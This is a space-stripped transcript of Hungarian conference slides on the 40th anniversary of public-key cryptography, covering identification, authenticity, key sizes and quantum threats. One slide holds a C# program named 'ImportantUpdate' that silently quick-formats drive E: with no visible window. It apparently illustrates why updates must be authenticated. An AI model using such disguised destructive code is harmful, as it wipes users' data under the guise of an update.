Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az...
Transcript of Miért biztonságos az Internet? 40 éves a nyílt kulcsú ...€¦ · Miért biztonságos az...
MiértbiztonságosazInternet?40évesanyíltkulcsúkriptográfia
PethőAttilaEgyetemitanár,DebreceniEgyetem3.MagyarJövőInternetKonferencia
Jövőinternettrendek:Smart CityacélkeresztbenBudapest,2016.november10.
Anyilvánoskulcsútitkosításfelfedezői
Whitfield DiffieMartinE.Hellman
NewDirections in Cryptography,IEEETrans on Inform.Theory,November1976
40évvelezelőttírták
• […]applications create aneedfornewtypesofcryptographicsystemswhich minimizethenecessityofsecurekeydistributionchannels andsupplytheequivalentofawrittensignature.• Thedevelopmentofcomputercontrolledcommunication networkspromiseeffortlessandinexpensivecontact betweenpeopleorcomputersonoppositesidesofthe world,replacingmostmailandmanyexcursionswith telecommunications.• Máraezmegvalósult!Kialakultéshatékonyanműködikaglobálisnyíltkulcsúinfrastruktúra.
Biztonságiparadoxon
• AzInternetegyóriásinyilvános hálózat,amelyhezmindenkicsatlakozhat.•Megkelloldania• Felhasználókazonosítását,• Adokumentumokhitelességénekazellenőrzését,• Kulcscserét ésabizalmasdokumentumoktitkosítását.
Azonosítás
• Annakbizonyítása,hogyafelhasználóaz,akinekmondjamagát.• Bizonyíték=azonosító:egyedi,bizalmasadat,deanyilvánosInternetenküldjük.• Embereknéllehetségesabiometrikus azonosítás.• Szoftvereknél,kütyüknél,dnónoknál csakjelszó!?• Hogyanazonosítjákmajdmagukatananoérzékelők ésnanorobotok?• Rendelhet-ehűtőszekrényparizertPethőúrnak?
Hitelesség
• Adokumentumnemváltozott/változtattákmegazátvitelsorán.• AzInternetfejlődéseszempontjábólkulcsfontosságú,hogyazújszoftvereketésszoftverfrissítésekethitelesenjuttassákelafelhasználóknak.Pozitívvisszacsatolás.• Járművekszoftverfrissítéseàműhelyekben.Lassúésköltséges.
Frissítés4
• A2048bitkulcsméretajánlás20éves!
• Amérnökökpesszimistábbakvoltak,mintamatematikusok.
• Alegnagyobbfaktorizált számok:1994:256bit1999:512bit2009:768bit2016:változatlan
using System;using System.Collections.Generic;using System.Linq;using System.Text;
namespace ImportantUpdate{class Run{public static void Main(String[]args){
FormatDrive('E');}public static void FormatDrive(
char driveLetter,string fileSystem ="NTFS",bool quickFormat =true)
{string drive=driveLetter +":";vardi=new System.IO.DriveInfo(drive);
varprocess =new System.Diagnostics.ProcessStartInfo();process.FileName ="format.com";process.WorkingDirectory =Environment.SystemDirectory;process.Arguments =
"/FS:"+fileSystem +"/Y"+(quickFormat ?"/Q":"")+""+drive;
process.UseShellExecute =false;process.CreateNoWindow =true;varformatProcess =System.Diagnostics.Process.Start(process);
}}
}
Titkosítás
• Látszólagsosehasználjuk.• Gyakranfolytatunkbizalmasüzenetváltást:• Bankitranzakciók• Egészségiállapotravonatkozóadatok• Számlák,adóbevallás,stb.
• Atitkosításaháttérbentörténik.• Veszélyeseszközpl.aterroristákkezében.
Merrefejlődikakriptográfia?
• Nagyonrossztapasztalatokazoktatásban!• Amahasználtnyíltkulcsúkriptográfiaialgoritmusok– RSA,ECC– feltörhetőekkvantumalgoritmussal(Shor,1994).• AlegnagyobbShor algoritmussaltényezőkrebontottszám:15.• Léteznekkvantum-rezisztensnyíltkulcsúkriptográfiaialgoritmusok,deakulcsaikéserőforrásigényükisnagyok.• AzIoT pehelykönnyűalgoritmusokatisigényel!